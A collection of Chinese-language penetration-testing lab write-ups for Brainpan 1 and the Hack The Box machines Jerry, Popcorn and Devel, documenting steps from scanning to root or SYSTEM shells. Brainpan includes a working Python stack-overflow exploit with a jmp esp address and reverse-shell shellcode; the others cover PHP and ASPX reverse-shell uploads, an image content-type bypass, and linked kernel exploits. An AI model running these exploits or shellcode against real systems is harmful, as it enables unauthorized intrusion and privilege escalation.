Brainpan: 1 Write-up

靶機：Brainpan: 1

nmap先掃全port

再掃sV、A


browser連入10000port，robots沒東西、source沒東西，找爆破

取得檔案

用immunity debugger開啟檔案，並執行run


嘗試fuzz該port，發生crash，找到EIP位址在35724134


fuzz_payload：

import sys, socket

host = sys.argv[1]

port = int(sys.argv[2])

junk = ""#ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000

con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

con.connect((host, port))

con.recv(1024)

con.send(junk.encode('utf-8'))

con.close()

得知塞524個字串就會溢位


透過objdump找出jmp esp或call eax的位址來塞shellcode，得知位址為311712F3，轉為\xF3\x12\x17\x31
 

再產shellcode，移除\x00

nc建5555port等回連

再做一次fuzz：

import sys,socket

eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3

b = "\x90"*10 #nop sled

buf =  ""

buf += "\xdb\xc8\xd9\x74\x24\xf4\x5d\xb8\x61\x9a\x57\x74\x29"

buf += "\xc9\xb1\x12\x31\x45\x17\x83\xed\xfc\x03\x24\x89\xb5"

buf += "\x81\x97\x76\xce\x89\x84\xcb\x62\x24\x28\x45\x65\x08"

buf += "\x4a\x98\xe6\xfa\xcb\x92\xd8\x31\x6b\x9b\x5f\x33\x03"

buf += "\xdc\x08\xc2\xb5\xb4\x4a\xc5\x2c\xf6\xc2\x24\xfe\x9e"

buf += "\x84\xf7\xad\xed\x26\x71\xb0\xdf\xa9\xd3\x5a\x8e\x86"

buf += "\xa0\xf2\x26\xf6\x69\x60\xde\x81\x95\x36\x73\x1b\xb8"

buf += "\x06\x78\xd6\xbb"

payload = ("a"*524) + eip + b + buf

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect((sys.argv[1],int(sys.argv[2])))

print s.recv(1024)

s.send(payload)

print s.recv(1024)

s.close()

回連成功，再用python -c 'import pty;pty.spawn("/bin/bash")'拿完整shell

找/etc/passwd有家目錄且有/bin/bash


sudo -l 發現可疑檔案


sudo 檔案後發現+ manual後可透過root權限執行任意檔案


執行vi寫!bash拿root shell

HTB - Jerry Write-up

掃port

連web

嘗試存取manager發現要帳密，試到admin;admin發現403錯誤訊息洩漏帳密

上exp(https://github.com/mgeeky/tomcatWarDeployer)

得system shell

HTB - Popcorn Write-up

ssh爆破


web目錄爆破


.bash_history

/torrent/


得知使用torrent hoster


依據poc得知/torrents.php?mode=upload有上傳頁面，但須登入

先註冊帳號




登入後即可存取上傳頁面


嘗試上傳php-reverse-shell，發現格式不支援


重新上傳正常的torrent格式，發現可上傳圖片


圖片上傳頁面中，顯示只支援jpg,jpge,gif,png


嘗試上傳php-reverse-shell，並將content-type修改為image/jpeg


發現可上傳成功

點選image file not found按鈕即可取得shell



嘗試使用前面.bash_history中的firefart帳號，發現無法登入成功；執行sudo -l無法成功


看/etc/passwd找有家目錄的使用者，並嘗試弱密碼，發現無法成功



使用目前權限發現可讀取/home/george/，嘗試ls -ARl遞迴檢視檔案


發現有特殊檔案motd，嘗試搜尋exp


確認系統版本


嘗試使用14339


在目標wget載exp後嘗試執行，發現會跳error，透過sed -i -e 's/\r$//' 14339.sh修正

HTB - Devel Write-up

得知使用iis7.5，推測os為win7 or server 2008R2

存取80port發現內容與ftp路徑內容一樣

產aspx reverse shell：

用handler接

http存取剛上傳的aspx shell，回連成功

檢查os版本

使用exphttps://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-015/MS10-015.zip (密碼為zcgonvh)，把壓縮檔內的15015/MS15-015/Release/MS15-015.exe透過ftp上傳上去

在靶機上切到c:\inetpub\wwwroot路徑，把檔案複製到c:\windows\temp\

並執行ms15-015.exe，確認取得system權限

執行cmd，取得system shell